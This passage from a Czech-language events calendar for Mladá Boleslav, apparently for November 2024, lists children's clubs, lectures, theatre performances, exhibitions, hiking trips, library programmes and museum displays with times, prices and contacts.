Kč/1100 Kč s klubovým předplatným – 5 vstupů. • Každé úterý 10:30–11:30 KLUB SLŮŇATA. Pro děti ve věku 1–3 roky v doprovodu rodiče. Cena 120 Kč/1 návštěva (100 Kč s klubovým předplatným). • Každou středu 8:30–10:00 a 10:00–11:30 KLUB ŠNEČEK. Hrátky se zvířátky a přírodou pro děti od 2 let v doprovodu rodiče. Cena jedné lekce: 120 Kč/dítě. • Každý čtvrtek 8:30–11:30 KLUB HAFÍK. Klub slouží k nenásilnému přivyknutí dětí od 2 do 4 let na vstup do mateřské školy. Cena za dopoledne 350 Kč/1500 Kč s klubovým předplatným – 5 vstupů. • Každý čtvrtek 8:30–10:00, 10:00–11:30 KLUB MOTÝLCI . Tvořivé hraní pro děti od 2-4 let v doprovodu rodiče či prarodiče. Cena jedné lekce 120 Kč za dítě nebo 500 Kč za 5 lekcí za dítě (permanentka). EKOCENTRUM KLENICE Klubovna–Zalužanská 1371, www.csopklenice.cz • Út 5. 11. 17:00 OCTY A KOMBUCHA. Přednáška s Radomírem Studeným . Účastníci ochutnají dřínový, kávový, jablečný a pivní ocet. Dále pak kombuchu ze zeleného a černého čaje a osvojí si její přípravu. Vstupné 50 Kč. • St 6. 11. 17:00 PODZIMNÍ TVOŘENÍ. Tvorba dekorací z přírodnin. Vyrobíme si růžičky, vitráže, obrázky – co si kdo vybere. Vstupné je 70 Kč plus cena materiálu dle výběru. • St 13. 11. 17:00 SEMENAŘENÍ. Zjistíte, jaké máme zdroje osiva a možnosti pěstování vlastního osiva, problematiku hybridního osiva a zjistíte, jak, co a kdy semenařit. Lektor: Bára Němcová. • Čt 21. 11. 16:00–19:00 MYKOLOGICKÁ PORADNA. Zkušený mykolog vám poradí, kde, které houby sbírat, jak je zpracovávat, seznámí vás s houbami, které jsou léčivé. Lektor: Stanislav Tutka • Pá 29. 11. 17:00 ADVENTNÍ TVOŘENÍ. Přijďte se naladit na vánoční atmosféru tvorbou adventních věnečků. Vstupné 100 Kč (zahrnuje základ na věnec, drátek a chvojí). K dispozici budou tavné pistole. Přízdoby si uhradíte a svíčky si přineste vlastní. Závazné přihlášky posílejte do 15. 11. na adresu ivana@csopklenice.cz. HVĚZDÁRNA MĚSTA MB Základní škola MB, 17. listopadu 1325 hvezdarnamb@seznam.cz, www.hvezdarnamb.cz Otevírací doba pro veřejnost – každý školní pátek, v listopadu od 18:00 hod. Prosíme o dochvilnost a k pozorování oblohy připomínáme dostatečně teplé oblečení. Program a podrobnější informace na webových stránkách. Za příznivého počasí pozorování planety Saturn , dvojhvězd, hvězdokup, mlhovin a povrchu Měsíce okolo první čtvrti (D) či úplňku (O). • Pá 1. 11. O KOMETÁCH A PADAJÍCÍCH HVĚZDÁCH. Přestože není snadné předpovídat jasnost a dobrou viditelnost komet, na konci roku pravidelně nastává maximum dvou meteorických rojů Leonid a Geminid. V přednášce vysvětlíme, jak úzce spolu tyto dva úkazy souvisejí. • Pá 8. 11. (D) JAK SE MĚŘÍ VZDÁLENOST K MĚSÍCI? Od prvních pokusů zjistit vzdálenost Země–Měsíc v období antiky uplynulo mnoho času, zlepšily se metody, používané měřicí přístroje i možnosti techniky. Vysvětlíme, jak a s jakou přesností dnes vzdálenost nejbližšího souseda dokážeme změřit a co všechno díky tomu víme. • Pá 15. 11. (O) CO SE DĚJE V MIKROSVĚTĚ? Pokud chceme porozumět nepředstavitelně velkému vesmíru, je paradoxně nezbytné zkoumat i objekty a zákony mikrosvěta, kde můžeme pozorovat různé základní částice. V pokusech využijeme přístroje, které tyto částice, resp. jejich stopy dokáží názorně zviditelnit. • Pá 22. 11. SOUHVĚZDÍ A LEGENDY PODZIMNÍ OBLOHY. Během pozorování oblohy za jasného počasí, příp. v přednášce s počítačovou projekcí návštěvníky seznámíme se základní orientací na podzimní obloze a připomeneme i mytologické příběhy, které se k jednotlivým souhvězdím vážou. Letos na podzim lze na večerní obloze pozorovat obří planety Saturn a později i Jupiter . • Pá 29. 11. JAK VELKÝ JE ATOM VODÍKU A CO O NĚM VÍME? Nedlouho po zveřejnění planetárního modelu atomu Ernestem Rutherfordem přišel dánský fyzik Niels Bohr s revoluční teorií pro nejlehčí prvek ve vesmíru – vodík. Podrobnosti vysvětlíme v další tematické přednášce s několika názornými pokusy. INFOCENTRUM MLADÁ BOLESLAV Železná 107, tel.: 326 109 402 infocentrum@kulturamb.cz • St 13. 11. 16:00 JIŘÍ KEZELIUS BYDŽOVSKÝ A JEHO SVĚT. Přijďte se seznámit s mladoboleslavským kantorem, písařem a primasem městské rady Jiřím Kezeliem Bydžovským (1576–1655). Jeho stěžejní dílo se nazývá Kronika města Boleslava Mladého – v něm shrnul dějiny města od jeho založení až do roku 1653. Sraz na nádvoří mladoboleslavského hradu. Přednáší Jakub Procházka. Cena 50 Kč (předprodej v infocentru). JEDNOTA BRATRSKÁ Blahoslavova 9, tel.: 606 607 204 rcdum@seznam.cz, www.jbmb.info • Út 12. 11. 17:00 USPÁVÁNÍ BROUČKŮ S LAMPIÓNOVÝM PRŮVODEM. Blahoslavova 187/9 / Havelský park. Sraz na zahradě Jednoty bratrské, odkud se vydáme průvodem do Havelského parku. Účast zdarma, lucerničky nebo lampiony s sebou. Další info: jbmb.cz. • Každý pátek 16:00–18:00 KŘESŤANSKÝ KLUB DOROSTU TIM. Pro kluky a holky od 6. do 9. třídy. Vstup zdarma. • Každý pátek 20:00–22:00 KLUB DESKOVÝCH A KARETNÍCH HER. Bez věkového omezení. Vstup zdarma. Komunitní a rodinné centrum Studánka Blahoslavova 187/9, jbmb.cz/studánka • Každé úterý 16:00–17:30 KLUB KLUBKO. Pro děti školního věku 1.–6. třída. Info na kancelar@jbmb.cz. • Každé úterý 16:00–17:30 LOGOHRÁTKY S KAPIČKOU. Pro rodiče s dětmi předškolního věku (3–6 let) – logopedické a pohybové hry pro rozvoj jemné a hrubé motoriky. Další informace: jbmb.cz/studánka. • Každá středa 9:30–11:30 TVOŘIVÝ SVĚT S KAPIČKOU. Pro děti 2–6 let s rodiči. Cena 50 Kč za program nebo zvýhodněná permanentka. • Každý pátek 9:30–11:30 HERNIČKA S KAPIČKOU. Nabízíme maminkám možnost posedět u kávy či čaje. Říkanky, písničky, tanečky pro děti 0–6 let s rodiči. Při pěkném počasí program na zahradě. Cena 50 Kč za program nebo zvýhodněná permanentka. KAVÁRNA V BŘIŠE VELRYBY Havelský park, nám. Míru 1387, tel.: 608 127 422 info@vbrisevelryby.cz, www.vbrisevelryby.cz • Út 5. 11. 19:00 JEŠTĚ NEJSEM, KÝM CHCI BÝT. Dokumentární, Česko / Slovensko / Rakousko , 2024, 90 min. Libuše Jarcovjáková je legenda světové fotografie a nespoutaná žena, která se vzepřela všem konvencím. Vstupné 120 Kč. • Pá 15. 11. 19:00 NAFUKOVACÍ PANNA. Drama / fantasy / romantický, Japonsko , 2009, 125 min. Nafukovací panna žije v tokijském bytě jako jediný společník muže ve středním věku. Nemluví ani se nehýbe, ale když jednoho dne ožije, její existence se změní. Vstupné 120 Kč. KLEMENTINKA Tř. Václava Klementa 601, tel.: 703 434 262 info@klementinka.cz, www.klementinka.cz • Po 4. 11. 9:30 DEGUSTAČNÍ POSEZENÍ: SALÁT. KC Klementinka, společenská místnost. Oblíbené posezení s doma připravenými pochutinami a jejich vzájemná degustace. Vstup zdarma, do naplnění kapacity. • Út 5. 11. 17:00 ZABAVNÍ VĚDOMOSTNÍ KVÍZ PRO SENIORY. KC Klementinka, spol. místnost. Vědomostní soutěž známá z hospod ve speciálním vydání pro seniory. Účast pro každého, kdo již pobírá důchod. Velikost družstev dle zájmu. Vstup 70 Kč. • Út 5. 11. a 19. 11. 16:00–18:00 KERAMIKA PRO VEŘEJNOST. KC Klementinka, výtvarná dílna. První termín tvorba, druhý glazování. Vyrobte si pod vedením lektorky dekorativní keramiku. Cena za obě setkání 300 Kč, senioři 250 Kč, dva sourozenci (děti) 400 Kč. • Pá 8. 11. 15:30–17:00 VÝTVARNÁ DÍLNA S PETROU GOLDFLAMOVOU ŠTĚTINOVOU. H71, sál v DPS Havlíčkova 71. Workshop výroby plošných loutek se známou výtvarnicí a ilustrátorkou na téma pohádky Tatínek a drak, kterou v úvodu přečte autor Arnošt Goldflam . Vhodné pro školní děti, předškolní s doprovodem. Vstup 120 Kč/dítě. • Pá 8. 11. 18:00 AUTORSKÉ ČTENÍ A BESEDA S ARNOŠTEM GOLDFLAMEM . H71, sál v DPS Havlíčkova 71. Setkání se známým režisérem, dramatikem, spisovatelem, hercem i pedagogem. Vstup 70 Kč. • Út 12. 11. 16:00–19:00 ČAJE O ČTVRTÉ. Plzeňský Šenk v Domě kultury (bývalá kavárna Felicie). Tanec a posezení při živé hudbě, hraje kapela Old Boys. Vstupné 70 Kč. • Po 18. 11. 10:00 PŘÍJMENÍ (NEJEN) NA MLADOBOLESLAVSKU. KC Klementinka, spol. místnost. Cyklus přednášek o genealogii. Přednáší předseda Mnichovohradišťského spolku genealogů a muž s nejčastějším příjmením v Česku Petr Novák . Vstup 50 Kč. Přihlašování předem prostřednictvím výše uvedených kontaktů nebo osobně v Klementince. • Út 26. 11. 16:30–18:00 WORKSHOP VÝROBY OZDOB ZE SKLENĚNÝCH KORÁLKŮ . KC Klementinka, výtvarná dílna. Pod vedením lektorky si dospělí a děti starší 8 let vytvoří zvířátka nebo ozdoby z malých korálků třeba na adventní věnec, stromeček či jako dárek paní učitelce. Odnesou si vše, co během kurzu vyrobí, materiál bude k dispozici. Cena 200 Kč. • Každé úterý od 16:00–18:00 DRAMATICKÝ KROUŽEK. KC Klementinka, cvičebna nebo zahrada. Nabízíme kroužek pro začínající mladé divadelníky od cca 10 do 15 let. Vede Libuše Mikulecká. Cena za 11 lekcí do 28. 1. 1300 Kč. • Každé úterý a čtvrtek 16:00–19:30 HRAJEME BRIDŽ. KC Klementinka. Vhodné pro začátečníky i ostřílené hráče. Více informací podá předseda klubu Jizera Bridge MB Pavel Horna na tel. 607 049 061. Vstup zdarma. • Každý čtvrtek 14:00–15:00 CVIČENÍ SPOLEČNOSTI PARKINSON. Pravidelné cvičení nemocných s Parkinsonovou chorobou. Více informací u předsedkyně Evy Fiedlerové na tel. č. 777 566 383 nebo na evafiedlerov@gmail.com. Zdarma. • STOLNÍ TENIS v otvíracích hodinách KC Klementinka. Rezervace stolu na ping-pong předem na e-mailu info@klementinka.cz nebo na tel. 703 434 262. • JÓGA V KLEMENTINCE Lekce vede certifikovaná lektorka jógy a meditací Marcela Kafková, informace a rezervace na www.relaxjoga.cz, tel.: 731 163 995, e-mail: cvicenismarci@gmail.com. • Pá 8. 11. 17:00–20:00 MALOVÁNÍ HENNOU. Workshop se Šárkou Klicperovou Živnou. Dozvíte se, co je henna, jak funguje na kůži, jak s ní pracovat. Vše si prakticky vyzkoušíte. Obdržíte také kornoutek s čerstvě namíchanou henna pastou. Další info a přihlášení na webu. • Každou středu 17:45–18:45 a 19:00–20:00 RELAX JÓGA. Kurz, celkem 15 lekcí. Základní informace a volná místa k rezervaci na webu. V případě volných míst je možné se přidat i později, případně využít jen jednorázového vstupu. KLUB ČESKÝCH TURISTŮ www.kctmb.com Výlety jsou určeny pro všechny, nejen pro členy KČT . • Ne 3. 11. OPEČENÝ BUŘT NA SOUTOKU JIZERY A LABE. Terén: nenáročný 15 km. Trasa: ČD Čelákovice Jiřina, Hrbáčkovy tůně, Káraný, soutok Jizery a Labe, Lázně Toušeň , ČD Brandýs n. Labem. Odjezd: MB m. 8.27, hl. n. 8.38 (přes Neratovice ) ČD. Návrat: MB hl. n. 17.20, m. 17.30 (přes Neratovice ) ČD. Občerstvení: Brandýs nad Labem , buřty vlastní. Jízdné PID 6 pásem 60/30 Kč. Vede: J. Kverek. • Pá 15. 11. – ne 17. 11. ZA POSLEDNÍM PUCHÝŘEM – KRÁSNÁ LÍPA. Terén: středně náročný. Poznání nejsevernějšího území ČR, akce KČT Krásnolipsko, hrad Oybin v SRN . Ubytování: chata Spojařka Horní Podluží s polopenzí. Odjezd: v pátek 15. 11. v 9 hod. od Bondy Centra MB. Cena: 3000 Kč, nečlen 3500 Kč. Přihlášky J. Kolářová, tel. 737 880 660, e-mail jindra.kolarova@seznam.cz. Platba nejlépe převodem na účet č. 19912408/0600. Vstupné na Oybin 5 eur. Doporučujeme cestovní připojištění do zahraničí (pátek). Vedou: J. Kolářová, J. Kverek. • So 16. 11. ZA POSLEDNÍM PUCHÝŘEM–KRÁSNÁ LÍPA. Akce turistického oddílu 8. ZŠ. Terén: nenáročný, trasa v okolí Krásné Lípy po zveřejnění propozic organizátora. Sraz v 8.10, odjezd MB m. 8.27 ČD, hl. n. 8.37 ® Arriva. Návrat: MB hl. n. 18.34 Trilex, m. 18.46 ČD. Jízdné IDOL celodenní 190/75 Kč, při platbě kartou150/75 Kč platí jen do Jedlové, zbytek je nutno dokoupit ve vlaku za tarif Arrivy nebo DÚK. Občerstvení: vlastní, Krásná Lípa. Vede: J. Trávnický, J. Mašínová. • So 23. 11. PODZIMNÍ SETKÁNÍ TURISTŮ STŘEDOČESKÉ OBLASTI: KOSTELEC N. ČERNÝMI LESY. Start a cíl: Kostelec nad Černými Lesy . Trasy: dle propozic pořadatelů (www. sokct.cz). Vzhledem ke složitější veřejné dopravě do místa konání (kombinace vlaku a autobusu – jízdné PID krajské celodenní 140/70 Kč) doporučujeme individuální účast (lze i autem). • So 30. 11. PROCHÁZKA POLABSKÝMI LESY. Terén: nenáročný 11 km. Trasa: ČD Ovčáry, Kozly, Mlékojedy, ČD Neratovice. Odjezd: MB město 8.20, hl. n. 8.38 ČD přes Všetaty. Návrat: MB hl. n. 15.20, m. 15.30 ČD. Občerstvení: vlastní, Neratovice . Jízdné PID 5 pásem 50/25 Kč, zpět 6 pásem 60/30 Kč. Vede: J. Mašínová. KNIHOVNA MĚSTA MB V. Klementa 1229, tel.: 326 328 256 knihovna@kmmb.cz, www.kmmb.cz Otvírací doba: • V centrální knihovně: Dospělí: po: 8:00–18:00, út: 8:00–18:00, st: 13:00–16:00, čt: 8:00–18:00, pá: 8:00–18:00, so: 9:00–13:00 hod. Děti: po: 12:00–17:00, út: 8:00–17:00, st: zavřeno, čt: 12:00–18:00, pá: 12:00–17:00, so: 9:00–13:00 hod. Vestibul čítárna tisku: po: 8:00–18:00, út: 8:00–18:00, st: 7:30–16:00, čt: 8:00–18:00, pá: 8:00–18:00, so: 9:00–13:00 hod. • V pobočce Severní Město: po: 13:00–17:00, út: 9:00–12:00, 13:00–18:00, st: 13:00–16:00, čt: 9:00–12:00, 13:00–17:00, pá: 9:00–14:00, so: zavřeno • Út 5. 11. 17:00 ZDRAVÝ SELSKÝ ROZUM PRO DOBU INFORMAČNÍ. Jak se vyznat v mediálním chaosu? To vše a mnohé další se dozvíte na besedě s Jaroslavem Valůchem, vedoucím projektů mediálního vzdělávání ve zpravodajské organizaci Transitions. Vstupné 50 Kč. • St 6. 11. 9:00–16:00 TÝMOVÁ SPOLUPRÁCE A HODNOCENÍ. Středočeská vědecká knihovna v Kladně ve spolupráci s Knihovnou města Mladá Boleslav vás zve na vzdělávací workshop v rámci projektu Rozvoj měkkých dovedností pracovníků v kulturním a kreativním sektoru ve Středočeském kraji II. Lektor: Štěpánka Uličná. Více na www.sakko.cz, kde se mohou zájemci přihlásit. • Čt 7. 11. 15:00–20:00 KLUB DESKOVÝCH HER PRO DOSPĚLÉ. Prostor otevřený začátečníkům i zkušeným hráčům ve věku 15+. Každý 1. čtvrtek v měsíci je pro vás připraven prostor s velkými stoly, více než 300 her, klidné prostředí. Hry si můžete přinést i vlastní. Vstup je zdarma. • Út 12. 11. 16:30–18:00 PODPORUJEME A RESPEKTUJEME PSYCHOMOTORICKÝ VÝVOJ DÍTĚTE V 1. ROCE ŽIVOTA. Seminář zaměřený na specifika vývoje dětí od narození do 12 měsíců věku. Lektorka: Miroslava Karaffová. Přihlášení předem je nutné v knihovně nebo online na www.kmmb.cz. Na seminář jsou účastníci vítáni i se svými miminky, pro rodiče v očekávání budou připraveny speciální panenky. Vstupné 80 Kč. • So 16. 11. 9:00–11:00 HÁČKOVACÍ WORKSHOP. Workshop je určen pro zájemce 15+, kteří chtějí s háčkováním začít a naučit se správné postupy a fígle na jednoduchých projektech. Tématem budou adventní dekorace. Vstupné je 100 Kč (nezahrnuje materiál a vybavení na háčkování!). Je potřeba se předem přihlásit. Přihlášení je možné osobně v knihovně nebo online na www.kmmb.cz. Uzávěrka přihlášek je 4. 11. • NE 17. 11. 18:00 1989: Z DENÍKU IVANY A. Promítání: Karel Strachota / ČR / 2023 / 42 min. Předlohou filmu se stal autentický deník osmnáctileté Ivany A., která osobitým pohledem středoškolačky reflektuje poslední rok existence komunistického Československa . Vstupné zdarma. • Út 19. 11. 18:00 PAMĚŤ NÁRODA NA UKRAJINĚ. Promítání s besedou. Od roku 2014 příběhy žen o Kramatorsku . Vstup zdarma. • St 20. 11. 15:00 KLUB KNIHOVNÍČEK. Knihovníček včelaří. Akce pro děti 3-6 let s doprovodem. Přihlášky na e-mail: detske@kmmb.cz (jméno, věk dítěte, kontakt) nebo osobně v dětském oddělení. Vstupné 30 Kč. • St 20. 11. 15:00 KLUBÍK PASTELKA. Pobočka knihovny v 9. ZŠ. Povídání o tom, jak vznikl a proč se slaví Halloween. Děti mohou přijít v kostýmech. Akce pro děti 3-6 let s doprovodem. Přihlášení osobně v pobočce Pastelka nebo na e-mail: habes@kmmb.cz. Vstupné 30 Kč. • Čt 21. 11. 18:00 TOUHA JMÉNEM EINODIS. Záznam divadelního představení. 70 minut, hrají M. Kubišová, A. Langerová. Kdo byla baronka Sidonie Nádherná , která i dnes inspiruje umělce? Vzestupy a pády jejího barvitého života zachycuje komorní muzikál Divadla Ungelt. Vstupné 100 Kč. • Čt 21. 11. 16:00 STAREJME SE O SVÉ ZDRAVÍ. Přednášku věnovaná tématu zdravého životního stylu a posilování imunity. Přednášet budou odborníci v oblasti zdraví a výživy Libuše Davidová, Klára Němečková a Anežka Spěšná. Vstup zdarma. • BĚHEM CELÉHO MĚSÍCE probíhají v knihovně v dopoledních hodinách sjednané lekce se základními i středními školami, kde se děti a studenti seznamují s knihovnou a jejími službami. Studenti 1. ročníků SŠ mohou až do konce listopadu využít možnost zvýhodněné registrace do knihovny. • Po 2. 12. 9:00 JAK VÉST NEJMENŠÍ DĚTI KE ČTENÍ. Chcete, aby vaše děti knížky milovaly? Poradíme, jak na to. Program pro děti od 0 do 3 let s doprovodem. Přihlášení nutné na: detske@kmmb.cz nebo telefonicky 326 329 432. Uveďte jméno dítěte, věk a kontakt. Vstup zdarma, děti vítány. Čtenářské soutěže pro děti: • Do st 30. 4. 2025 SBĚRATELÉ KNOFLÍKŮ. Celoroční čtenářská hra začíná! Opět hrajeme ve třech věkových kategoriích. Letos se děti můžou těšit na sběr krásných knoflíků, a hlavně na zajímavé knížky. Hra je určena pro děti od 2. do 9. třídy. Zájemci se mohou zapojit kdykoliv během roku. Více se dozvíte v dětském oddělení v hl. budově knihovny. • Do st 30. 4. 2025 LOVCI PEREL. Velká čtenářská soutěž pro děti od 7 do 13 let. Za přečtené knížky děti získávají perly. Do soutěže se děti mohou zapojit kdykoli během roku. Více informací poskytnou knihovnice v pobočce v Severním Městě (Pastelka). . KULTURA MLADÁ BOLESLAV Dům kultury, Dukelská 1093 www.kulturamb.cz • St 6. 11. 19:00 MŮJ VZOR, BOŽSKÝ KAREL. DK, velký sál. Kristián Šebek zpívá písně Karla Gotta . Vstupné od 990 Kč, www.ticketportal.cz. • Pá 8. 11. 20:00 VENTOLIN. DK, divadelní sál. Vstupné 280 Kč v předprodeji, 350 Kč na místě, www.kamvecer.net. Akce se koná ve spolupráci s Pluhárnou. • St 13. 11. 8:45 a 10:15 PRASEČÍ SLEČINKY ANEB PRASEČINKY. DK, divadelní sál. Divadelní pohádka nejen pro MŠ. Divadýlko z pytlíčku. Vstupné 50 Kč. • St 13. 11. 19:00 JAVORY BEAT A HRADIŠŤAN. DK, divadelní sál. Jiří Pavlica , Hradišťan &amp;amp; Hana a Petr Ulrychovi, Javory Beat na jednom pódiu. Vstupné od 500 Kč, www.topkoncerty.cz. • So 16. 11. 9:00–13:00 BAZÁREK PRO MAMINKY A DĚTI. DK, velký sál. • Út 19. 11. 9:00–16:00 BURZA PRÁCE. DK, velký sál. Nabídka pracovních příležitostí. • St 20. 11. 10:00 KINO SENIOR–JANŽURKA. DK, divadelní sál. Dokument ČR/SR, 110 min. Vstupné zdarma. • St 20. 11. 19:00 MOC A SÍLA HYPNÓZY. DK, divadelní sál. Hypnotizér Jakub Kroulík. Vstupné 550 Kč, www.evstupenka.cz. • So 23. 11. 14:00–22:00 12. MLADOBOLESLAVSKÉ SLAVNOSTI VÍNA . DK, velký sál. Ochutnávka vín, vinná stezka, Boleslavské víno , gurmánské speciality, k poslechu hraje kapela Kaňůr. Vstupné 200 Kč (v ceně degustační sklenička). • Út 26. 11. 8:45 a 10:15 O princezně, Luciášovi a makových buchtách. DK, divadelní sál. Divadelní pohádka nejen pro MŠ. Uvádí CZI divadlo. Vstupné 50 Kč. • Út 26. 11. 19:00 NA VÁNOCE BUDU GAY. DK, velký sál. Divadelní komedie. Vstupné od 490 Kč, www.evstupenka.cz. • St 27. 11. 10:00–18:00 OUTLET VOLANSKY FASHION. DK, foyer. • St 27. 11. 19:00 HONZA NEDVĚD ML. A PŘÍBUZNÍ. DK, divadelní sál. Koncert. Vstupné 450 Kč, www.evstupenka.cz. • Pá 29. 11.–út 31. 12. 16:00–20:00 VEČERNÍ ADVENTNÍ TRHY. Park Výstaviště. Vánoční tržiště, občerstvení, kulturní program. • So 30. 11. 18:00 SMART GOSPEL MLADÁ BOLESLAV . DK, divadelní sál. Benefiční koncert na podporu dětí se spinální muskulární atrofií. Vstupné dobrovolné. • So 30. 11. 20:00 VÁNOČNÍ SALSA TANČÍRNA. DK, zrcadlový sál. Tančírna s živou kubánskou kapelou. Koncert, vystoupení, animace, tančírna. Pořádá Salsa Familia Mladá Boleslav . Galerie Pod Věží Staroměstské nám. 69 Tel.: 326 716 109, www.kulturamb.cz Otvírací doba: út–čt 13:00–17:00, pá–ne 10:00–17:00 • Do pá 8. 11. DUROŇ – KŮS. Obrazy a sochy. • Čt 14. 11. 19:00 DUO MANERA. S. Vimrová a M. Žára. Vstupné 250 Kč, www.evstupenka.cz. • Čt 14. 11. – st 18. 12. IVAN KOMÁREK – NÁZNAK. Vernisáž je 13. 11. v 18:00. Městský palác Templ, Krajířova 102 Tel.: 326 109 403 (kancelář), 326 109 409 (pokladna) www.kulturamb.cz Otvírací doba: út–ne 9:00–12:00, 13:00–16:00 • Čt 7. 11. 18:00 DOBRODRUŽSTVÍ HLASU A KONTRABASU. R. Ahmedová a P. Tichý – HLASkontraBAS. Vstupné v předprodeji 290 Kč/ 350 Kč v den akce, www.evstupenka.cz. • Pá 15. 11.–so 14. 12. HOLKY OD BAREV. Výstava. Autorky: Danka Chrastilová, Hanka Kubelková, Monika Lainová, Lenča Svobodová, Janča Šlesaríková. Vernisáž je 14. 11. v 17:00. • Do ne 10. 11. SKLO A DESIGN. Výstava prací žáků SUŠ sklářské Železný Brod . Sbor českých bratří Českobratrské nám. 123 Tel.: 326 109 406, www.kulturamb.cz • Do ne 10. 11. SORAH–NEPROPADEJ PANICE. Výstava obrazů autora zvaného SORAH alias Hároš, vlastním jménem Jiří Volf. • Pá 15. 11.–ne 22. 12. ZATMĚNÍ SLUNCE. Malby Elišky Jakubíčkové . Vernisáž je 14. 11. v 18:00. Divadýlko na dlani Dům kultury Mladá Boleslav , Dukelská 1093 divadelní sál (zadní vchod), tel.: 739 017 581 info@divadylko-nadlani.cz Vstupenky je možné zakoupit v předprodeji v Infocentru MB. • Čt 14. 11. 19:30 SALOON V MODRÉM. Vystoupí Sunny Side a Báry. Vstupné 150 Kč. • Čt 28. 11. 19:30 VÁVRA. Inscenace Divadýlka na dlani. Vstupné 100 Kč (předprodej), 120 Kč (půl hodiny před začátkem). LETECKÉ MUZEUM METODĚJE VLACHA Letiště Aeroklubu Mladá Boleslav , www.lmmv.cz Otvírací doba: po–ne 9:00–17:00 Stálé expozice: • HISTORICKÁ LETADLA. Originály a věrné repliky letadel z období od počátků letectví do 50. let 20. století. • HISTORIE LETECTVÍ. Unikátní předměty, přibližující historii letectví od 1. světové války; expozice je doplněna o novou část, prezentující exponáty z let 1945–2000. • LETECKÉ SIMULÁTORY. Pilotování letadla a seskoky padákem v Leteckém muzeu Metoděje Vlacha . • Po 4. 11. 19:30 PODZIM NA KŘÍDLECH JAZZU. V rámci abonentního cyklu vystoupí kapela Jokers Band. • Po 25. 11. 19:30 PODZIM NA KŘÍDLECH JAZZU. V rámci abonentního cyklu vystoupí kapela Brass Band Rakovník. MĚSTSKÉ DIVADLO MLADÁ BOLESLAV Palackého 263 Předprodej vstupenek: Husova 214/8 Tel.: 326 323 269, www.mdmb.cz Velká scéna: • Pá 1. 11. 19:00 DONAHA. • So 2. 11. 19:00 JEN PRAVDU, DRAHÝ. KŘESŤANOVÁ. Agentura Harlekýn Praha . • Po 4. 11. 18:00 KRYSÁCI A ZAMILOVANÝ EDA. Divadlo Za2 Praha. • Út 5. 11. 10:00 a 19:00 HRÁČI. • St 6. 11. 19:00 MILENA. • Čt 7. 11. KDO SE BOJÍ VIRGINIE WOOLFOVÉ . Západočeské divadlo Cheb . • Pá 8. 11. 10:00 a 19:00 KRÁLOVA ŘEČ. • So 9. 11. 17:00 ZLATOVLÁSKA. Divadlo Natálie Venturové Praha. • Po 11. 11. 19:00 1000 TVÁŘÍ ADINY. • Út 12. 11. 10:00 1000 TVÁŘÍ ADINY. • Út 12. 11. 19:00 HOTEL MEZI DVĚMA SVĚTY. • St 13. 11. 18:00 ZIMNÍ PŘÍHODY VČELÍCH MEDVÍDKŮ. Divadlo Krapet Praha . • Čt 14. 11. 19:00 DRÁKULA. • Pá 15. 11. 18:00 POJĎTE PANE, BUDEME SI HRÁT. Divadlo rozmanitostí Most. • So 16. 11. 19:00 MILUJU TĚ, ALE… • Po 18. 11. 19:00 RAIN MAN. Divadlo na Fidlovačce Praha . • Út 19. 11. 19:00 FANTASTICKÉ DIVADLO. Východočeské divadlo Pardubice . • St 20. 11. 17:00 OCEŇOVÁNÍ DOBROVOLNÍKŮ MAGISTRÁTU MLADÁ BOLESLAV . • Čt 21. 11. 19:00 SPLAŠENÉ NŮŽKY. • Pá 22. 11. 19:00 MISTROVSKÁ LEKCE. • So 23. 11. 19:00 MILENA. • Po 25. 11. 19:00 SLAVNÉ EVROPSKÉ HOUSLE. Koncert houslisty Jaroslava Svěceného s klavírním doprovodem Lucie Karlové. • Út 26. 11. 19:00 JMÉNO. • St 27. 11. 18:00 REVIZOR. • Pá 29. 11. 19:00 MILENA. • So 30. 11. 19:00 ROZTANČENÉ DIVADLO 2024 MLADÁ BOLESLAV . Malá scéna: • Po 4. 11. 19:00 KYTICE. • St 6. 11. 19:00 NÁVŠTĚVY U PANA GREENA. • Čt 14. 11. 19:00 SWINGOVÝ VEČER. Jakub Šafr a Swing Session Quartet. • So 16. 11. 19:00 VŠECHNY BÁJEČNÝ VĚCI. • St 20. 11. 19:00 KYTICE. • So 23. 11. NOVECENTO (1900). • Út 26. 11. VŠECHNY BÁJEČNÝ VĚCI. Zadáno pro Boleslavský klub přátel divadla . • Čt 28. 11. 19:00 KYTICE. Výstava: • Z ČECH AŽ NA BALI. Jan Nezdara. MUZEUM MLADOBOLESLAVSKA Staroměstské náměstí –Hrad 1 Tel.: 326 325 616, 326 322 542, www.muzeummb.cz Otvírací doba: út–pá 9:00–17:00 so, ne 9:00, 12:00, 12:30, 17:00 Stálé expozice a dlouhodobé výstavy: • PRACOVNA VÁCLAVA KLEMENTA . • RODINNÁ DÍLNA JELÍNKŮ. • VENKOV V PROMĚNÁCH ČASU. • DARY LESŮ, LUK A BAŽIN. • ENCYKLOPEDIE MLADÁ BOLESLAV . Internetový portál je unikátním pomocníkem při objevování minulosti našeho kraje – www. encyklopediemb.cz. • PODCAST MUZEA MLADOBOLESLAVSKA. Od letošního června: podcasty se věnují různým tématům z oboru historie, archeologie a muzejnictví. Muzeum pro děti: • MUZEJNÍ HRÁTKY. Samoobslužné bedny s rekvizitami, pomůckami a úkoly přiblíží povolání archeologa, přírodovědce nebo historika. • MUZEJNÍ HERNA. Naleznete ji v druhém patře mladoboleslavského hradu. Muzeum dále nabízí: • Do út 31. 12. TRADICE V OBRAZECH. Výstava velkoformátových fotografií českých krojů od fotografa Václava Šilhy. • Do út 31. 12. DOBOVÁ MÓDA NA FOTOGRAFIÍCH. Výstava historických fotografií s tipy, jak fotky datovat podle oblečení. • Do pá 28. 2. 2025 SMETANOVO MLADOBOLESLAVSKO. Bedřich Smetana je s Mladoboleslavskem spojen od mládí. Po jeho stopách se můžete projít na fotografiích na nádvoří a pak i doopravdy ve městě a okolí. Výstava vznikla u příležitosti 200. výročí Smetanova narození. NEZÁVISLÉ DIVADLO – NOVÁ SCÉNA Staroměstské nám . – Železná 33/4 tel.: 605 729 756, www.nezavisledivadlo.cz/nova-scena Předprodej vstupenek v infocentru MB. • St 6. 11. 16:30 PODZIMNÍ ČAROHRANÍ PRO DĚTI. • Čt 14. 11. 16:30 JAK SE VAŘÍ POHÁDKA. • Út 19. 11. 18:00 HOST DO DOMU. Host: Pavel Trávníček . • St 20. 11. 17:00 ŽENA A VÁNOCE VE ZDRAVÍ. Seminář. • Čt 28. 11. 16:30 ŠVEC A ČERT. Pohádka. • St 4. 12., pá 6. 12. 16:30 MIKULÁŠSKÁ BESÍDKA. Čertovské tancování, andělské soutěže a na závěr programu dorazí i Mikuláš s nadílkou. NÍZKOPRAHOVÝ KLUB ČINŽÁK (pro 